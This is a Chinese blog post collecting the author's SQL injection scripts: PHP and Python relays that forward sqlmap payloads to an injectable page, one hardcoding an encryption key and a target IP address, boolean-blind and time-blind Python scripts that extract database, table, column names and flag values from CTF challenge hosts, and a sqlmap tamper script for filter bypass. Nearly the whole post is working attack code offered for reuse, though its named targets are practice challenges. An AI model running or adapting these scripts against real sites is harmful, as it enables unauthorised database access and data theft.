【原创 脚本】SQL脚本

有绕过请自行更改

中转注入

PHP版

简洁版

<?php
	$id=base64_encode("id=".$_GET['id']);
	echo file_get_contents("http://xxx.com/sqli.php?{$id}");	//sqli.php是原网页
?>

正式版

<?php 
function encode($id){
	$id = $id.'hxb2018';
	$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
	mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
	$data = base64_encode(base64_encode(mcrypt_generic($td,$id)));
	mcrypt_generic_deinit($td);
	mcrypt_module_close($td);
	return $data;
}
$url = 'http://47.107.236.42:49882/news/list.php?id=';
$param = encode($_GET['id']);
$response = file_get_contents($url.$param);
echo $response;
?>
<?php
//先开启php.ini 中的extension=php_curl.dll
set_time_limit(1);
$curl = curl_init();//初始化curl
$id = $_GET['id'];
//替换id空格和=
$id = str_replace(" ","%20",$id);
$id = str_replace("=","%3D",$id);
$url = "http://xxx.com/aaa.php";
// 设置目标URL  
curl_setopt($curl, CURLOPT_URL, $url);     
// 设置header   
curl_setopt($curl, CURLOPT_HEADER, 0);    
// 设置cURL 参数,要求结果保存到字符串中还是输出到屏幕上。   
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 0);    
// 运行cURL,请求网页   
$data = curl_exec($curl);   
// 关闭URL请求   
curl_close($curl);
?>

Python版

from flask import Flask
from flask import request
from selenium import webdriver
driver_path = "C:/Users/Administrator/AppData/Local/Programs/Python/Python37/Lib/site-packages/selenium/webdriver/chrome/chromedriver.exe"
chrome = webdriver.Chrome(driver_path)
chrome.get("http://127.0.0.1")#目标注入点
app = Flask(__name__)

def send(payload):
#起到中转payload效果。
  chrome.find_element_by_id("username").send_keys(payload) #把payload填到有注入点的地方
  chrome.find_element_by_id("password").send_keys("aaaa")
  chrome.find_element_by_id("submit").click()
  return "plase see flask server!" #随便返回一下不重要

@app.route('/')
def index():
    # 接收sqlmap传递过来的payload
    payload = request.args.get("payload")
    return send(payload)

if __name__ == "__main__":
    app.run()

布尔盲注

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
urls = 'http://478951db-f91e-4a82-9941-c35a7c3ee800.chall.ctf.show/index.php?id=-1/**/or/**/'
true = ' turning'
name = ''
for number1 in range(50):  # 猜flag位数
    for number2 in range(44, 126):  # ASCII 字符0 ~ }
        # # 库
        # url = urls + 'ascii(substr(database() from %d for 1))=%d' % (number1, number2)
        # #表
        # url = urls + 'ascii(substr((selectgroup_concat(table_name) from information_schema.tables where table_schema=database())%d,1))=%d' % (number1,number2)
        #字段
        # url = urls + 'ascii(substr((selectcolumn_name from information_schema.columns where table_name="flag" limit 0,1),%d,1))=%d' % (number1,number2)
        #字段信息
        url = urls + 'ascii(substr((select flag from flag)from %d for 1))=%d' % (number1,number2)
        response = requests.get(url)
        if true in response.text:
            name += chr(number2)  # chr()返回 ASCII 字符
            print(name, '...')
            break
print('\n>>>flag=', name, '<<<\n')

版本二

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
urls = 'http://challenge-f99d8d9361e35dff.sandbox.ctfhub.com:10080/?id='
true = 'query_success'
#库名
def database_name():
    name = ''
    for number in range(1,8):#猜测数据库库名的长度
        for letter in 'qwertyuioplkjhgfdsazxcvb':#可以想象为一个字典,用所有字母一个个去试,正确返回,错误返回select table_name from information_schema.tables,则会报错
            url = urls + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
            number, letter)#%d整型%s字符串
            response = requests.get(url)
            if true in response.text:#判断response.text里面是否有true
                name = name + letter
                print(name,'...')
                break#终止本次循环
    print('\n>>>database_name=',name,'<<<\n')
# database_name()
#表名
def table_name():
    list = []
    for number1 in range(3):#猜有3个表
        name = ''
        for number2 in range(1,8):
            for letter in 'qwertyuioplkjhgfdsazxcvbnm':
                url = urls + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                    number1, number2, letter)
                print(url)
                response = requests.get(url)
                if true in response.text:
                    name = name + letter
                    print(name,'...')
                    break
        list.append(name)
    print('\n>>>table_name=', list,'<<<\n')
table_name()
#字段名
def column_name():
    list = []
    for number1 in range(3):  # 判断表里最多有4个字段
        name = ''
        for number2 in range(1,8):  # 判断一个 字段名最多有9个字符组成
            for letter in 'qwertyuioplkjhgfdsazxcvbnm':
                url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                number1, number2, letter)
                response = requests.get(url)
                if true in response.text:
                    name = name + letter
                    print(name,'...')
                    break
        list.append(name)
    print('\n>>>column_name=', list,'<<<\n')
# column_name()
#字段信息
def get_flag():
    name = ''
    for number1 in range(50):  #猜flag位数
        for number2 in range(48, 126): #ASCII 字符0 ~ }
            url = urls + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
            number1, number2)
            response = requests.get(url)
            if true in response.text:
                name = name + chr(number2)#chr()返回 ASCII 字符
                print(name,'...')
                break
    print('\n>>>flag=',name,'<<<\n')
# get_flag()

运用lift进行截取

import requests
url = 'http://4a1c1083-75e8-4cf2-92d8-55cda4100937.node3.buuoj.cn/Less-8/?id='
flag = ''
for number in range(1,10):
    for letter in range(33,126):
        payload0 = flag + '%s' % (chr(letter))
        payload = "1' and left(database()," + str(number) + ")=" + "\'" + payload0 + "\'" + '--+'
        response = requests.get(url + payload)
        if 'You' in response.text:
            flag += chr(letter)
            print(flag.lower())
            break
print(flag)

时间盲注

版本一

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://01dcd092-b929-4a5c-be0b-1ad5bffe1292.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        #payload = f'if(substr(database(),{number1},1) = "{chr(number2)}",sleep(1),1)'#可以忽略这步,把这里爆出得库加在下面的database()和table_schema可能会更加准确
        #payload = f'if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = "{chr(number2)}",sleep(2),1)'
        #payload = f'if(substr((select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx" and table_schema="ctfshow_web"),{number1},1) = "{chr(number2)}",sleep(2),1)'
        payload = f"if(substr((select flaga from ctfshow_flagx),{number1},1) = '{chr(number2)}',sleep(1),1)"
        data = {
            'ip':payload,
            'debug':'0'
        }
        # current1_time = time.time()
        response = requests.post(url,data=data)
        #新姿势
        time = response.elapsed.total_seconds()#获取响应时间,单位s
        # current2_time = time.time()
        # current = current2_time - current1_time
        if time >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break

仔细看还是可以用的

版本二

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://01dcd092-b929-4a5c-be0b-1ad5bffe1292.chall.ctf.show/api/"
name = ''
for i in range(4):#表或字段的数量
    for number1 in range(1,50):
        for number2 in range(45,126):
            #payload = f'if(substr(database(),{number1},1) = "{chr(number2)}",sleep(1),1)'
            #payload = f'if(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),{number1},1) = "{chr(number2)}",sleep(1),1)'
            payload = f'if(substr((select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx" limit {i},1),{number1},1) = "{chr(number2)}",sleep(2),1)'
            #payload = f"if(substr((select flaga from ctfshow_flagx),{number1},1) = '{chr(number2)}',sleep(1),1)"
            data = {
                'ip':payload,
                'debug':'0'
            }
            # current1_time = time.time()
            response = requests.post(url,data=data)
            #新姿势
            time = response.elapsed.total_seconds()#获取响应时间,单位s
            # current2_time = time.time()
            # current = current2_time - current1_time
            if time >= 1:
                name = name + chr(number2)
                print(str.lower(name))
                break

下面那个版本应该可以避免此类状况

版本三 字符型注入

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://c6778fe7-8d66-4e93-a617-efcdb0c32c18.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        #payload = f"1' or if(substr(database(),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"#可以忽略这步,把这里爆出得库加在下面的database()和table_schema可能会更加准确
        #payload = f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
        #payload = f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc' and table_schema='ctfshow_web'),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
        payload = f"1' or if(substr((select flagaa from ctfshow_flagxc),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"
        data = {
            'ip':payload,
            'debug':'0'
        }
        # current1_time = time.time()
        response = requests.post(url,data=data)
        #新姿势
        time = response.elapsed.total_seconds()#获取响应时间,单位s
        # current2_time = time.time()
        # current = current2_time - current1_time
        if time >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break

版本四

#!/usr/bin/env python
"""
Author: huayang
"""
import requests, time
urls = 'http://challenge-f8fcb03f18fbc00a.sandbox.ctfhub.com:10080/?id='
def database_name():
    name = ''
    for number in range(8):
        for letter in 'qwertyuioplkjhgfdsazxcvbnm':
            url = urls + 'if(substr(database(),%d,1) = "%s",sleep(1),1)' % (number, letter)
            current1_time = time.time()
            response = requests.get(url)
            current2_time = time.time()
            current = current2_time - current1_time
            if current > 1:#cao'cao'cao'cao'coa'coa'o'ca'o'ca'o'o'cao'co'ao'c
                name = name + letter
                print(name)
                break
    print(name)
def table_name():
    array = []
    for number1 in range(4):
        name = ''
        for number2 in range(8):
            for letter in 'qwertyuioplkjhgfdsazxcvbnm':
                url = urls + 'if(substr((select table_name from information_schema.tables where table_schema="sqli" limit %d,1),%d,1) = "%s",sleep(1),1)' % (
                number1, number2, letter)
                current1_time = time.time()
                response = requests.get(url)
                current2_time = time.time()
                current = current2_time - current1_time
                if current > 1:
                    name = name + letter
                    print(name)
                    break
        array.append(name)
    print(array)
def column_name():
    name = ''
    for number2 in range(8):
        for letter in 'qwertyuioplkjhgfdsazxcvbnm':
            url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema="sqli"),%d,1) = "%s",sleep(1),1)' % (
            number2, letter)
            current1_time = time.time()
            response = requests.get(url)
            current2_time = time.time()
            current = current2_time - current1_time
            if current > 1:
                name = name + letter
                print(name)
                break
    print(name)
def flag():
    name = ''
    for number1 in range(1, 50):
        for number2 in range(48, 126):
            url = urls + 'if(substr((select flag from sqli.flag),%d,1) = "%s",sleep(1),1)' % (number1, chr(number2))
            current1_time = time.time()
            response = requests.get(url)
            current2_time = time.time()
            current = current2_time - current1_time
            if current >= 1:
                name = name + chr(number2)
                print(name)
                break
    print(name)
database_name()
# table_name()
# column_name()
# flag()

tampet

#!/usr/bin/env python
"""
Author: huayang你
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>huayang<-->bypass<<<\n")
def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue
            elif payload[i] == "*":
                retVal += chr(0x31)
                continue
            elif payload[i] == "=":
                retVal += chr(0x09) + 'LIKE' + chr(0x09)
                continue
            elif payload[i] == " ":
                retVal += chr(0x09)
                continue
            elif payload[i] == "'":
                retVal += '%00%27'
                continue
            retVal += payload[i]
    return retVal
==>转载请注明来源哦<==

评论

  1. 头像
    Lxx
    Windows Chrome
    7月前
    2021-6-21 14:32:54

    看看

  2. 头像
    Windows Edge
    9月前
    2021-4-16 20:57:53

    看看

  3. 头像
    Windows Firefox
    9月前
    2021-4-16 11:00:32

    看看

  4. 头像
    10月前
    2021-3-19 16:28:41

    看下

  5. 华扬
    华扬 博主
    11月前
    2021-2-27 22:22:18

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇